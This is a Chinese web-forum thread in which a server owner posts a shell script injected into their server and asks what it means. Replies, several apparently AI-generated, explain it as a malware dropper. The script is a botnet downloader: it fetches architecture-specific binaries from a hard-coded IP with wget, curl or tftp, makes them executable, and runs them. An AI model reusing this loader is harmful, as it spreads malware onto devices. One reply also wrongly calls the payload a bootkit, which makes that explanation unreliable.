·设为首页收藏本站📧邮箱修改🎁免费下载专区💎积分✅卡密📒收藏夹👽聊天室
返回列表 发布新帖

有人往我服务器里注入脚本,有能看明白是啥意思的不

112 7
发表于 2024-4-24 16:57:51 | 查看全部 阅读模式

马上注册,免费下载更多dz插件网资源。

您需要 登录 才可以下载或查看,没有账号?立即注册

×
  1. binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"server_ip="103.163.214.97"binout="lib"exec="your device just got infected to a bootnoot"rm -rf $binoutfor arch in $binarysdorm -rf $archcd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ipchmod 777 $binoutstatus=`./$binout $1`if [ "$status" = "$exec" ]; then        rm -rf $binout        breakfirm -rf $binoutdone
复制代码
我要说一句 收起回复
创宇盾启航版免费网站防御网站加速服务

评论7

IT618发布Lv.8 发表于 2024-4-24 16:58:48 | 查看全部
根据您提供的代码片段,这段代码看起来像是一个简单的 Bash 脚本。让我解释一下这段代码的大致功能:

1. 首先,定义了一些变量:
   - `binarys`:包含一系列架构的名称,如"MIPS"、"x86"、"ARM"等。
   - `server_ip`:指定了服务器的 IP 地址。
   - `binout`:指定了输出的文件名。
   - `exec`:包含一个字符串,即执行的消息。

2. 接着,脚本执行了一系列操作:
   - 删除了名为 `$binout` 的文件。
   - 使用 `for` 循环遍历 `$binarys` 中的架构名称。
   - 在循环中,脚本尝试从服务器下载特定架构的文件,并保存为 `$binout` 文件。
   - 更改了 `$binout` 的权限为可执行。
   - 运行了 `$binout` 文件,并将输出存储在 `status` 变量中。
   - 如果 `status` 的值等于 `$exec`,则删除 `$binout` 文件并终止循环。

3. 最后,无论条件是否满足,都会删除 `$binout` 文件。

需要注意的是,这段代码看起来像是一个恶意脚本,因为它尝试从远程服务器下载文件并执行,而且在执行时删除了一些文件。这种行为可能会导致设备被感染或受到损害。

如果这段代码不是您编写的,建议不要运行它,因为它可能会对您的设备造成危害。如果您需要帮助分析或理解其他代码,请随时告诉我,我将竭尽所能提供帮助。
我要说一句 收起回复
浅生Lv.8 发表于 2024-4-24 16:59:01 | 查看全部
这个脚本看起来像是一个恶意软件传播工具,它的作用如下:

变量设置:
binarys:列出了一系列架构的名称,包括 MIPS、MPSL、x86、ARM 等。
server_ip:指定了一个服务器的 IP 地址。
binout:指定了一个输出文件的名称。
exec:包含了一条恶意消息,提示设备已经被感染。
文件操作:
rm -rf $binout:删除名为 $binout 的文件或目录。
rm -rf $arch:在循环开始之前删除了可能存在的不同架构的文件或目录。
cd /tmp || cd /var || cd /dev:尝试进入 /tmp、/var 或 /dev 目录,如果其中一个目录不存在则尝试下一个。
wget、curl 或 tftp:从指定的 $server_ip 地址下载不同架构的文件,并命名为 $binout。
权限设置:
chmod 777 $binout:将下载的文件 $binout 的权限设置为 777,即可执行。
执行:
status=./$binout $1``:运行下载的文件,并将结果存储在 status 变量中。
检查结果:
如果执行结果与 exec 变量中的消息相匹配,即设备已被感染,则删除下载的文件 $binout 并退出循环。
循环结束:
如果没有发现设备被感染的迹象,则继续循环删除 $binout 文件并尝试下载其他架构的文件。
总体来说,这个脚本的目的似乎是尝试下载不同架构的恶意文件,并在本地执行,如果设备被感染,则停止执行并删除下载的文件。
我要说一句 收起回复
独家记忆Lv.8 发表于 2024-4-24 16:59:29 | 查看全部
## 代码分析:

这段代码的作用是尝试在目标设备上执行一个bootkit程序,使其感染设备。它会依次尝试不同的CPU架构,下载对应的bootkit程序并执行,直到成功感染设备。

**以下是代码的详细分析:**

1. **定义变量:**
    - `binarys`:包含一系列CPU架构名称的字符串,如mips、x86、arm等。
    - `server_ip`:存放bootkit程序所在服务器的IP地址。
    - `binout`:下载的bootkit程序文件名,设置为"lib"。
    - `exec`:bootkit程序执行成功后的预期输出字符串,即"your device just got infected to a bootnoot"。

2. **删除已有文件:**
    - `rm -rf $binout`:删除已存在的"lib"文件。

3. **循环遍历CPU架构:**
    - 使用`for`循环遍历`binarys`变量中存储的每个CPU架构名称。

4. **下载bootkit程序:**
    - 进入`/tmp`、`/var`或`/dev`目录(尝试不同的目录,以确保下载成功)。
    - 使用`wget`、`curl`或`tftp`命令从服务器下载对应架构的bootkit程序,并保存为"lib"文件。
    - 使用`chmod 777`命令赋予"lib"文件可执行权限。

5. **执行bootkit程序:**
    - 使用`./$binout $1`命令执行"lib"文件,并将第一个参数传递给它。
    - 将执行结果保存到`status`变量中。

6. **检查执行结果:**
    - 使用`if`语句判断`status`变量的值是否等于`exec`变量的值。
    - 如果相等,说明bootkit程序执行成功,设备已被感染。

7. **清理:**
    - 删除"lib"文件。
    - 使用`break`语句跳出循环,因为已经成功感染设备。

8. **循环结束:**
    - 如果循环结束时仍未成功感染设备,说明所有尝试的CPU架构都不匹配或下载/执行失败。

## 总结:

这段代码是一个恶意脚本,旨在感染目标设备并植入bootkit程序。它利用了不同CPU架构的兼容性,并尝试多种下载方式,以提高成功率。

这是Gemini 1.5 Pro的回答
我要说一句 收起回复
婷姐Lv.8 发表于 2024-4-24 17:00:28 | 查看全部
下载下脚本来全是黑框
我要说一句 收起回复
独家记忆Lv.8 发表于 2024-4-24 17:00:36 | 查看全部
这个脚本看起来像是一个恶意软件传播工具,它的作用如下:

变量设置:
binarys:列出了一系列架构的名称,包括 MIPS、MPSL、x86、ARM 等。
server_ip:指定了一个服务器的 IP 地址。
binout:指定了一个输出文件的名称。
exec:包含了一条恶意消息,提示设备已经被感染。
文件操作:
rm -rf $binout:删除名为 $binout 的文件或目录。
rm -rf $arch:在循环开始之前删除了可能存在的不同架构的文件或目录。
cd /tmp || cd /var || cd /dev:尝试进入 /tmp、/var 或 /dev 目录,如果其中一个目录不存在则尝试下一个。
wget、curl 或 tftp:从指定的 $server_ip 地址下载不同架构的文件,并命名为 $binout。
权限设置:
chmod 777 $binout:将下载的文件 $binout 的权限设置为 777,即可执行。
执行:
status=./$binout $1``:运行下载的文件,并将结果存储在 status 变量中。
检查结果:
如果执行结果与 exec 变量中的消息相匹配,即设备已被感染,则删除下载的文件 $binout 并退出循环。
循环结束:
如果没有发现设备被感染的迹象,则继续循环删除 $binout 文件并尝试下载其他架构的文件。
总体来说,这个脚本的目的似乎是尝试下载不同架构的恶意文件,并在本地执行,如果设备被感染,则停止执行并删除下载的文件。
我要说一句 收起回复
IT618发布Lv.8 发表于 2024-4-24 17:01:01 | 查看全部
简单说就是从别人服务器下载可能有危害的程序文件到你的机器,然后在你的机器上运行
我要说一句 收起回复
浅生Lv.8 发表于 2024-4-24 17:01:33 | 查看全部
几个叼毛不懂可以不要回,一堆gpt回复看了就恶心
我要说一句 收起回复

回复

 懒得打字嘛,点击右侧快捷回复【查看最新发布】   【应用商城享更多资源】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

创宇盾启航版免费网站防御网站加速服务
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:52.15.35.129,GMT+8, 2024-12-23 19:41 , Processed in 0.374989 second(s), 119 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2024 Discuz! Team.

关灯 在本版发帖
扫一扫添加微信客服
QQ客服返回顶部
快速回复 返回顶部 返回列表